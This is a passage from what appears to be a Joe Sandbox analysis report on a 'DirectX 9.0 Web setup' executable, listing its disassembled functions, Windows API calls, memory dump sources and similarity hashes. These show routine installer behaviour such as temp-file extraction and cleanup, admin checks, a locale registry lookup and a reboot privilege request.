                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1084409-0
                                                                                                • Opcode ID: d96f9e2c227fc8fd5b123fd756cf88f8dd5409e60f2e5f7db06c1da812d6ec4c
                                                                                                • Instruction ID: f7ff3d6030b5b4b6263aff2ff2ca75ae18718437ba1bcdff345b54a36bb66057
                                                                                                • Opcode Fuzzy Hash: d96f9e2c227fc8fd5b123fd756cf88f8dd5409e60f2e5f7db06c1da812d6ec4c
                                                                                                • Instruction Fuzzy Hash: 8A01923130030CDBEB278F69EC48F6537A9B790729F008225F6A5865E4CB769964CB00
                                                                                                Function 01004112 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01004127
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$DirectoryMessageWindows
                                                                                                • String ID:
                                                                                                • API String ID: 824312211-0
                                                                                                • Opcode ID: ca96c28c2df01ffdf837ee669907e7b40b94055632e991d685ff63f2d1cff087
                                                                                                • Instruction ID: bca2c9432b1f888fb9469f10f577c2e1376d14a01b837acd07ddd468fc16ab10
                                                                                                • Opcode Fuzzy Hash: ca96c28c2df01ffdf837ee669907e7b40b94055632e991d685ff63f2d1cff087
                                                                                                • Instruction Fuzzy Hash: 0CE04FF5B403057BFA22FBB45D4AFE632AC6710B08F0044A177C5EA0C6E6F4D5848B64
                                                                                                Function 01005BCA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(?,010023AD,?), ref: 01005BCE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 9581c502d22aba61f5526ad2671cdf4715d83c214d9c839e97df5bb296cd7dd6
                                                                                                • Instruction ID: b3f3ffb5a34c765f4dd1797c4ec993e395d72c4c0f957be6f6d41efe976d23e8
                                                                                                • Opcode Fuzzy Hash: 9581c502d22aba61f5526ad2671cdf4715d83c214d9c839e97df5bb296cd7dd6
                                                                                                • Instruction Fuzzy Hash: 5BC08C361148044AA5124230AC020993592AB00239F948B20E1F2C00D0E279D410DD20
                                                                                                Function 01005A00 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01004C18: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
                                                                                                  • Part of subcall function 01004C18: SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
                                                                                                • CloseHandle.KERNEL32(00000000,01005ACB,?,?,01005ACB,00000000), ref: 01005A50
                                                                                                  • Part of subcall function 010058FE: SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
                                                                                                  • Part of subcall function 01002EAF: SetFileAttributesA.KERNEL32(00771048,00000080,?,?,00000000), ref: 01002EE4
                                                                                                  • Part of subcall function 01002EAF: DeleteFileA.KERNEL32(00771048,?,?,00000000), ref: 01002EEC
                                                                                                  • Part of subcall function 01002EAF: LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EF7
                                                                                                  • Part of subcall function 01002EAF: LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EFA
                                                                                                  • Part of subcall function 01002EAF: lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
                                                                                                  • Part of subcall function 01002EAF: SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
                                                                                                  • Part of subcall function 0100263F: ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectoryEventFileFreeLocal$AttributesCloseCreateDeleteExitHandleWindowslstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2109604340-0
                                                                                                • Opcode ID: 6bb0501f5843ebe1865109c29f3cf8357a2669cd15ada572a2d507304c427ffa
                                                                                                • Instruction ID: 84a9f70d874b0ce605a0360ea1fac1df0a3d9085ade5438d4a511a43078ce571
                                                                                                • Opcode Fuzzy Hash: 6bb0501f5843ebe1865109c29f3cf8357a2669cd15ada572a2d507304c427ffa
                                                                                                • Instruction Fuzzy Hash: 81F08C31E003419BFB73EFB89D88B5A3BD5AB43250F044448E9C0931D8CB7AC4848F18
                                                                                                Function 01002CB2 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(?,00000000,00000000,01003CF6,00000000,?,?,?,?,?,00000000), ref: 01002CEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: a9b46e3db594f2fcd46db8c9e3fd42ad0b2307defafbda2f4743e6373b85ddb5
                                                                                                • Instruction ID: c15912df4965dd569d42e93d5fd4232a5505faff8a50d4eacb1245b87f6ff462
                                                                                                • Opcode Fuzzy Hash: a9b46e3db594f2fcd46db8c9e3fd42ad0b2307defafbda2f4743e6373b85ddb5
                                                                                                • Instruction Fuzzy Hash: 1BF01275506716EE97E3CF2D994869BBFE5FF84750F12092ED4EEC2290DB3099018B10
                                                                                                Function 01002E03 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 01002E09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 3761449716-0
                                                                                                • Opcode ID: 12b5d25ff1b6920fdbd45c6bb364aca1b53fd2bb8657c90971766ff1ed60e0e7
                                                                                                • Instruction ID: aceb04de2820cb8e4959a70ec4af59ab00b6b623b0161863bd08f56dc2faf270
                                                                                                • Opcode Fuzzy Hash: 12b5d25ff1b6920fdbd45c6bb364aca1b53fd2bb8657c90971766ff1ed60e0e7
                                                                                                • Instruction Fuzzy Hash: 1DA00239648241EBEE529B90DF09B097AA1AB84B02F008544F2CD4519486B68410EF62
                                                                                                Function 01002E10 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 2979337801-0
                                                                                                • Opcode ID: a050d75f0b9f73008538d2428d150b865eddb9cf78cebb317d7b67494dfc1878
                                                                                                • Instruction ID: fe044374dafef1cb320f1ead0a573a760266085682d6567bdb0ea2f0c700d41b
                                                                                                • Opcode Fuzzy Hash: a050d75f0b9f73008538d2428d150b865eddb9cf78cebb317d7b67494dfc1878
                                                                                                • Instruction Fuzzy Hash: 239002304081009BDF165B20DA0D9497B71AB80701F404454A0858016487368850EB01

                                                                                                Non-executed Functions

                                                                                                Function 01001C7F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 86stringfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 01001CAD
                                                                                                • lstrcatA.KERNEL32(?,0100128C), ref: 01001CC1
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 01001CD1
                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 01001CEB
                                                                                                • lstrcmpA.KERNEL32(?,01001288), ref: 01001D02
                                                                                                • lstrcmpA.KERNEL32(?,01001284), ref: 01001D18
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 01001D30
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 01001D59
                                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 01001D67
                                                                                                • DeleteFileA.KERNEL32(?), ref: 01001D74
                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 01001D84
                                                                                                • FindClose.KERNEL32(00000000), ref: 01001D95
                                                                                                • RemoveDirectoryA.KERNEL32(00000000), ref: 01001D9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Findlstrcatlstrcpy$lstrcmp$AttributesCharCloseDeleteDirectoryFirstNextPrevRemovelstrlen
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2233361564-3102400635
                                                                                                • Opcode ID: 678c5ee2d3b4477588ce13c604fb9acbca6998944e647f19a3d9bdee4b119596
                                                                                                • Instruction ID: a00f6dc85045b5a751000bc1c93d4bef5bd8a44fc60f5db9cfdca4d6f7f72306
                                                                                                • Opcode Fuzzy Hash: 678c5ee2d3b4477588ce13c604fb9acbca6998944e647f19a3d9bdee4b119596
                                                                                                • Instruction Fuzzy Hash: 0F3119B690415DABEF62EBB5DD88FCA7BBCAF14340F440592B6C5D2084DBB4D6848F60
                                                                                                Function 0100168B Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 010015F6: LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
                                                                                                  • Part of subcall function 010015F6: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
                                                                                                  • Part of subcall function 010015F6: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
                                                                                                  • Part of subcall function 010015F6: FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
                                                                                                  • Part of subcall function 010015F6: FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,00000000,?,01004E0E,?,?,00000000), ref: 010016CF
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,01004E0E,?,?,00000000), ref: 010016D6
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,00000001,?,01004E0E,?,?,00000000), ref: 010016F6
                                                                                                • GetLastError.KERNEL32(?,01004E0E,?,?,00000000), ref: 01001700
                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,DirectX 9.0 Web setup,?,01004E0E,?,?,00000000), ref: 01001714
                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,00000000,?,01004E0E,?,?,00000000), ref: 0100172D
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,01004E0E,?,?,00000000), ref: 0100174A
                                                                                                • EqualSid.ADVAPI32(00000004,?,?,01004E0E,?,?,00000000), ref: 01001760
                                                                                                • FreeSid.ADVAPI32(?,?,01004E0E,?,?,00000000), ref: 01001782
                                                                                                • LocalFree.KERNEL32(00000000,?,01004E0E,?,?,00000000), ref: 01001789
                                                                                                • CloseHandle.KERNEL32(?,?,01004E0E,?,?,00000000), ref: 01001793
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2168512254-3102400635
                                                                                                • Opcode ID: bb5fe4861fc728833115231643eac192e69f4f778fcc582930cb2832bc57f699
                                                                                                • Instruction ID: fa5215c0b5e6886bf03ae5b40989aa8fe66889e67d1830d7472693dfac7b44e0
                                                                                                • Opcode Fuzzy Hash: bb5fe4861fc728833115231643eac192e69f4f778fcc582930cb2832bc57f699
                                                                                                • Instruction Fuzzy Hash: A7315E71A00249EFEB23DBA49988EEE7BB9FF04340F5004A5F6C5E2085D775D644CB61
                                                                                                Function 01005D22 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                  • Part of subcall function 01005C1C: CharNextA.USER32(?,00000000,01005DE8,?,?), ref: 01005C55
                                                                                                Strings
                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 01005D9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                • API String ID: 3346862599-1109908249
                                                                                                • Opcode ID: 431f45f9673300b689da86ba081f87beb83a14b1989b5a4117b9124139db4642
                                                                                                • Instruction ID: 083c54a924ab9761291a410baedf6ac57de624089c224ea8294de35afb17b59e
                                                                                                • Opcode Fuzzy Hash: 431f45f9673300b689da86ba081f87beb83a14b1989b5a4117b9124139db4642
                                                                                                • Instruction Fuzzy Hash: 17212571640248DBEB36CFA9DC48B9D37E8AB04715F105129F991D20C3E7BAC488CF91
                                                                                                Function 010018B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 010018EB
                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000004,00000000), ref: 0100190A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 2349140579-3733053543
                                                                                                • Opcode ID: 593663a4c8d54b802f0f1e7a054ef3afb4eab00d1d64c970485e8e945c1f4114
                                                                                                • Instruction ID: 05607d40d37e3d7cfa1acf5e7c24027e9414555ed0db78eb33ce689f5d9f9449
                                                                                                • Opcode Fuzzy Hash: 593663a4c8d54b802f0f1e7a054ef3afb4eab00d1d64c970485e8e945c1f4114
                                                                                                • Instruction Fuzzy Hash: 21014C71642225BAF7329BA28C0DFEF7EACEF06794F000410BA89E40C5D6B5D70496F5
                                                                                                Function 0100263F Relevance: 1.5, APIs: 1, Instructions: 24shutdownCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 01002681
                                                                                                  • Part of subcall function 010018B5: GetCurrentProcess.KERNEL32(00000028,00000004,00000000,?,?,01005ACB,00000000), ref: 010018C2
                                                                                                  • Part of subcall function 010018B5: OpenProcessToken.ADVAPI32(00000000), ref: 010018C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2795981589-0
                                                                                                • Opcode ID: be1fa5d6ff6b383463169fe5ad6f937a4c193f6604caf8e2e6f9bacbda75ccd5
                                                                                                • Instruction ID: 51cfbc9f9594ef64733f325afd49e40a3b229e39ce56858cbad60d3a963125f2
                                                                                                • Opcode Fuzzy Hash: be1fa5d6ff6b383463169fe5ad6f937a4c193f6604caf8e2e6f9bacbda75ccd5
                                                                                                • Instruction Fuzzy Hash: 5EE08C7068830670FEB327A44E4FB2956D05B5DF18F148589FBC5B90C2CEF9C5918A2A
                                                                                                Function 010080E2 Relevance: .3, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94dfc90b70575c19e3580177b28661a5fa6066ea7c0266af5a04ec66b46a9598
                                                                                                • Instruction ID: f4983a0e36b43ffcb518e60d76000cdcfe8a0af48af8faed87a4da5ec99b531e
                                                                                                • Opcode Fuzzy Hash: 94dfc90b70575c19e3580177b28661a5fa6066ea7c0266af5a04ec66b46a9598
                                                                                                • Instruction Fuzzy Hash: FBB18835A056959BDB1ACF28C4B02EEBBA0BF45314F18C2AED9D65B782C7309A55C7C0
                                                                                                Function 01007E02 Relevance: .3, Instructions: 256COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6cf292941154d0cd74ae677f771b0fd9eb91a69feae1d5814fbd6b05e46b596
                                                                                                • Instruction ID: 2aba7d770cb182b78b7652e6660436575dda3edefe08705f868ec3b507a5431e
                                                                                                • Opcode Fuzzy Hash: a6cf292941154d0cd74ae677f771b0fd9eb91a69feae1d5814fbd6b05e46b596
                                                                                                • Instruction Fuzzy Hash: 30A18331A052959BDB0ACF58C0A01EDFBB0FF15714F1982AED9D66B782C7346A55CB80
                                                                                                Function 0100791E Relevance: .2, Instructions: 212COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84d648d0c2a16e755c7f17ce33ad772204976945cc31b9215aee01e7bcf3b4c0
                                                                                                • Instruction ID: a80a0796c6c78a90fa091916d3490ddb8f164fad7c0897db2317df91665225f3
                                                                                                • Opcode Fuzzy Hash: 84d648d0c2a16e755c7f17ce33ad772204976945cc31b9215aee01e7bcf3b4c0
                                                                                                • Instruction Fuzzy Hash: 7B8186319056569FDB1ACF58C0E01EDBBB0FF46314F1882ADD9D66B382C6346A95CBC0
                                                                                                Function 0100878E Relevance: .2, Instructions: 203COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fac211542a3869dc8880f68233b4de0dfb7fb2ced29cb3492eb621ecda2867df
                                                                                                • Instruction ID: 8b19583f7cc30d59397d6f805d7a34eb48c67b28d2acfd70727ba9726ee87818
                                                                                                • Opcode Fuzzy Hash: fac211542a3869dc8880f68233b4de0dfb7fb2ced29cb3492eb621ecda2867df
                                                                                                • Instruction Fuzzy Hash: 4961C231A105598BEF2ADE6CC4504AD7BE2FFC9380F28852EEDD2C7295DA30D856C740
                                                                                                Function 010030A7 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 351stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharNextA.USER32(00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 010030FC
                                                                                                • GetModuleFileNameA.KERNEL32(0100B99E,00000104,00000001,DirectX 9.0 Web setup,00000000), ref: 010031AB
                                                                                                • CharUpperA.USER32(?), ref: 010031F2
                                                                                                • CharUpperA.USER32(-0000004F), ref: 0100327E
                                                                                                • lstrcmpiA.KERNEL32(RegServer,?), ref: 010032FB
